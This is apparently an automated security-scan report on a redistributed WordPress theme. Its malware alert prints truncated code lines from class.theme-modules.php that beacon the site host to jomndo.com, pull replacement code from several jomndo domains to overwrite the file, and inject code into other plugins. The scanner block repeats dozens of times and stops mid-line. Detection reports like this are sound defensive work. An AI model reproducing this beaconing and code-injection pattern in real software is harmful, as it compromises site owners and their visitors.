0
Validation results

MicrojobEngine | Shared by VestaThemes.com

MicrojobEngine | Shared by VestaThemes.com

WordPress 6.5.2 theme
0
  • THEME TYPEWordPress theme 6.5.2
  • FILE NAMEmicrojobengine2.zip
  • FILE SIZE4651714 bytes
  • MD586ca437a8b0376494c5d1eee75b6eb14
  • SHA1ff9bd4544b93fee2f70a26ba137ee9b3e4c9d745
  • LICENSEGNU GPL 3
  • FILES INCLUDEDCSS, PHP, XML, Bitmap images, Adobe Illustrator
  • THEME URIhttp://www.enginethemes.com/themes/microjobengine
  • VERSION1.3.9
  • AUTHOR URI
  • TAGSfluid-layout, responsive-layout, accessibility-ready, translation-ready
  • CREATION DATE2021-05-17
  • LAST FILE UPDATE2021-06-18
  • LAST VALIDATION2021-06-18 00:01
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
  1. Customizer : Sanitization of Customizer settings Found a Customizer setting that did not have a sanitization callback function in file class-ae-customizer.php. Every call to the add_setting() method needs to have a sanitization callback function passed.
  2. Title : Title No reference to add_theme_support( "title-tag" ) was found in the theme.The theme needs to have <title> tags, ideally in the header.php file.The theme needs to have a call to wp_title(), ideally in the header.php file.
  3. Security breaches : Use of base64_decode() Found base64_decode in file OAuth.php. 202: $decoded_sig = base64_decode($signature);
  4. Security breaches : Use of base64_encode() Found base64_encode in file et-google-checkout.php.
     $signature		=	base64_encode($this->generate_signature($nvpstr));
     $cart			=	base64_encode($nvpstr);
    Found base64_encode in file OAuth.php.
     return base64_encode(hash_hmac('sha1', $base_string, $key, true));
     return base64_encode($signature);
  5. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe width="<?php echo $width ?>" height="<?php echo $height; ?>" src="https://www.youtube.com/embed/<?php echo $iframe[1]; ?> in file alias-function.php. 1768: <iframe width='<?php echo $width ?>' height='<?php echo $height; ?>' src='h
  6. Malware : Operations on file system file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: 